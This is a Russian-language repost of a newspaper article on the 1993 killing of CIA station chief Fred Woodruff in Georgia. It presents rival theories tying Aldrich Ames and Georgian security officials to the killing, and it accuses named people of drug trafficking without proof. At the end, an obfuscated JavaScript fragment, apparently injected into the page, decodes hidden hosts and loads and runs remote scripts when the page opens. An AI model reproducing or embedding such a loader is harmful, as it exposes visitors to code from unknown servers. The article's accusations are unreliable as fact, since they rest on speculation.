Материалы разведки. Часть 1.2 Scofield: Не повторять ошибок прошлого
Материалы разведки. Часть 1.2
Scofield: Не повторять ошибок прошлого

http://www.agentura.ru/dossier/grusia/rezident/?print=Y(Е. Крутиков «Известия») Его звали Фредерик Вудрафф, и несмотря на то, что ему было уже 45 лет, все привыкли обращаться к нему просто Фред.
… Он доверял Эльдару Гоголадзе — телохранителю Э. Шеварднадзе, его правой руке и alterego, защищавшему президента всю войну в Абхазии. И, конечно же, Гоголадзе знал, что Вудрафф — глава резидентуры ЦРУ в Тбилиси (как говорят американцы, «директор станции»), подчинявшийся Каспийскому департаменту недавно воссозданного Оперативного директората — не аналитик, а именно шпион.
… Вудрафф официально был сотрудником политического отдела посольства США в Тбилиси, отвечавшим за «regional affairs» — «региональные дела», то есть мятежные Южную Осетию, Абхазию, Мегрелию и фрондирующую Аджарию, но кроме того являлся и личным советником президента Шеварднадзе по вопросам национальной безопасности. Ему не всегда удавалось находить общий язык с Игорем Гиоргадзе — тогдашним главой грузинской службы безопасности, но он, честно говоря, особенно и не старался. Для его работы хватало прекрасных отношений непосредственно с президентом и начальником его охраны — Эльдаром Гоголадзе.
… Забирать тело [Ф. Вудраффа] прилетел лично директор ЦРУ Д. Вулси.
… В последствии полиция проведет баллистическую экспертизу, которая подтвердит, что пуля, попавшая в лоб Фреду Вудраффу, была выпущена именно из автомата 20-летнего Анзори Шармаидзе. Он быстро признается (его начали бить еще на месте ареста) и объяснит, что просто голосовал с приятелем на Военно-грузинской дороге, чтобы доехать до расположения своего батальона в Тбилиси. А ни одна сволочь не ост анавливалась. И тогда, разозлившись, он выстрелил одиночным вслед пронесшемуся мимо дорогому джипу.
Когда через пару дней сумрачный субъект из ФБР, возглавлявший американскую часть следственной группы, поинтересовался у замгенпрокурора Грузии Вахтанга Гварамия, каким это таким образом пуля попала Вудраффу в лоб, если Шармаидзе стрелял ВСЛЕД машине, Гварамия промолчит. Но если солдат (американец не мог выговорить фамилию «Шармаидзе» и каждый раз подыскивал новое определение) стрелял вдогонку, то он должен был попасть в девушек на заднем сиденье. Кстати, где они? Давайте нарисуем схему (американцы очень увлекались всякого рода графиками и схемами, даже привезли с собой дипломатическим багажом специальную доску и особый мел для нее) траектории пули. Получается, что, влетев в машину сзади (а где тогда входное отверстие?), она пролетела весь салон, никого не задев, затем пробила переднюю стойку, зависла в воздухе на одной скорости с машиной, развернулась и ударила Вудраффа в лоб?
… Суд над Шармаидзе был скоротечен и скоропостижен. Мальчишка получил 15 лет тюрьмы. Администрация президента Клинтона формально более не проявляла интереса к трагической гибели высокопоставленного сотрудника ЦРУ Фредерика Вудраффа. По неподтвержденным данным, его фамилия украсила засекреченную Стену славы в здании ЦРУ. В 1994 году по окончанию суда над Анзори Шармаидзе комиссия ФБР официально заявила, что убийство было «редким актом насилия (random act of violence) и никаким образом не связано с политикой».
… Все испортил тогдашний министр внутренних дел Грузии генерал Шота Квирая. В конце июля 1996 годаон неожиданно заявил, что Шармаидзе не убивал Вудраффа. По словам Квирая, убийство организовали российские спецслужбы через Эльдара Гоголадзе и некоего грузинского бизнесмена. Очень кстати Анзори Шармаидзе неожиданно отказался от своих показаний, заявив, что его подвергали пыткам во время следствия.
Шота Квирая назвал конкретного виновника — Игоря Гиоргадзе, бывшего шефа грузинской госбезопасности, обвиняемого практически во всех смертных грехах, в том числе и в покушении на Эдуарда Шеварднадзе. Квирая, прошедший нелегкий жизненный путь от простого милиционера в родной Мегрелии до начальника полиции Тбилиси, а затем и главы МВД, оказался крепок задним умом — он публично заявил, что всегда подозревал полковника Эльдара Гоголадзе как российского агента и непосредственного исполнителя убийства Вудраффа.
… Российская сторона ответила довольно быстро. Тогдашний спикер внешней разведки Юрий Кобаладзе через Ассошэйтид пресс в весьма резкой форме опроверг все обвинения, заявив, что убийствами агентов друг друга серьезные разведки мира не занимаются уже много десятков лет. Это одна из основных составляющих принципа «fair play» — честной игры, на которой держится мир разведки. Иначе так давно бы друг друга перестреляли на просторах стран третьего мира.
И тогда все вспомнили о том типе с противными усиками — проверяющем из Лэнгли, который приехал за неделю до гибели Вудраффа в Тбилиси, чтобы инспектировать его работу. Это был один из начальников Вудраффа (в ЦРУ иногда случаются случаи параллелизма управления), руководитель русского отдела, ставший впоследствии всемирно известным, — мистер Олдрич Эймс.
Эймс всего лишь инспектировал на месте деятельность своего подчиненного, одной из основных задач которого было создание дееспособных грузинских спецслужб. В этом нет особого секрета, российские спецслужбы прекрасно это знают, хотя, конечно же, такое глубокое проникновение в соседнюю страну представляет угрозу для национальной безопасности России. Но это еще не повод для убийства. В работе Вудраффа не было ничего такого, что требовало бы немедленного и столько грубого вмешательства. Как раз наоборот: зная о подлинной роли советника посольства США в Тбилиси, можно было получить больше информации, наблюдая за ним, а не убив его.
В США Олдрича Эймса никогда не обвиняли напрямую в соучастии в убийстве Фреда Вудраффа. Но с молчаливого одобрения Лэнгли, версия о том, что Эймс передал Москве данные на Вудраффа, а затем Игорь Гиоргадзе приказал убить американца «чтоб глаза не мозолил», стала почти официальной.
… Из доклада Джеймса Вулси Конгрессу США стала известна новая деталь. Вудрафф имел обширный опыт борьбы с наркомафией и помимо основного оперативного задания (помощь в организации спецслужб Грузии и поддержку правительства Эдуарда Шеварднадзе) резидентура в Тбилиси должна была отслеживать наркотраффик (конкретно, героина) через Грузию на Запад. Причем за эту часть работы отвечал лично Фред Вудрафф.
В докладе категорически утверждалось, что Эдуард Шеварднадзе «оказался способен помочь администрации Клинтона выяснить связь между визитом мистера Эймса в Грузию и убийством директора станции ЦРУ Вудраффа». ЦРУ заявило Конгрессу, что Вудрафф был убежден в том, что «люди, которых Вашингтон посылает к нему для сотрудничества (имеются в виду связи в грузинских спецслужбах — Е.К.), вовлечены в торговлю наркотиками». Если бы Вудрафф послал бы такое донесение в Лэнгли, первым, кто его прочел, был бы Олдрич Эймс.
… В Грузии того времени бытовало мнение, что транзит «тяжелых» наркотиков находится под контролем службы безопасности. Имя Эльдара Гоголадзе называлось в этой связи едва ли не в каждом втором случае. Практически неограниченная власть, которой в тот период обладал шеф охраны Шеварднадзе, давала ему возможность быстро и легко находить контакты на таможнях и среди «коллег по бизнесу» в спецслужбах соседних стран. Единственная территория внутри самой Грузии, на которой Гоголадзе не мог ничего сделать, была Аджария, с руководством которой власти в Тбилиси находились в непрерывном конфликте.
… Для ЦРУ наступил конец света. Секретная следственная группа посчитала, что Олдрич Эймс, выяснив из бесед с Фредом Вудраффом положение дел с наркотраффиком в Грузии, сообщил об этом в Москву, а уже ИЗ МОСКВЫ эта информация рикошетом вернулась к Эльдару Гоголадзе. А он организовал «отдых на природе», на обратном пути убил сильно нетрезвого Вудраффа, после чего инсценировал «случайный одиночный выстрел» из автомата молоденького солдата. По другой версии Олдрич Эймс передал эту информацию непосредственно в среду торговцев наркотиками, которые в свою очередь поставили в известность Гоголадзе, а далее по схеме. Подтверждению одной из этих двух версий и «помог» Эдуард Шеварднадзе.
Выступая в Конгрессе, представитель ЦРУ сказал дословно следующее: «Если мистер Эймс предал КГБ войну Америки против наркотиков, то теперь администрация Клинтона и весь Запад падают в глубокую и темную бездну (deep and dark abyss)»(конец цитаты).
Судя по всему, Ф. Вудрафф и Э. Гоголадзе действовали вместе. А когда из Москвы пришла информация о том, что О. Эймсу все стало известно, было решено ликвидировать резидента ЦРУ, чтобы опять доставить проблемы администрации Б. Клинтона. Дело сначала было закрыто, но потом Ш. Квирая (в июле 1996 года, т.е. в ходе финального этапа предвыборной кампании в США) сообщил, что убийство Ф. Вудраффа организовали российские спецслужбы. Новая команда, пришедшая в Лэнгли, настояла на этой версии, сделав главным виновником И. Гиоргадзе.
Это было очередным упреком администрации Б. Клинтона, «замявшей дело».
Кроме того, И. Гиоргадзе мешал наркотранзитным схемам, которые контролировал Ш. Квирая. Особенность в том, что Ш. Квирая действовал не в одиночку, а при поддержке Гарри Беста (Большого Гарри), который ранее был резидентом ЦРУ в Пешаваре.
Но Г. Бест был связан с соперником Б. Клинтона на выборах — сенатором Р. Доулом. Документальное подтверждение именно этих связей, выявленных Управлением по борьбе с наркотиками (Drug Enforcement Administration, DEA), оказалось в предвыборном штабе Б. Клинтона. После чего, в штабе республиканцев рассматривался вопрос о снятии Роберта («Боба») Доула с выборов (см. С. Андреев «Шпионы и бандиты» // газета «Завтра» №43 (99)).
Именно Г. Бест и его компания MegaOil(в которой были трудоустроены совсем не нефтяники) были причастны к организации провокаций для разжигания полномасштабной войны между Арменией и Азербайджаном за Нагорный Карабах в 1992 году. В Азербайджане Г. Бест выстроил отношения с Г. Алиевым.
http://pravosudija.net/article/scofield-ne-povtoryat-oshibok-proshlogo
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии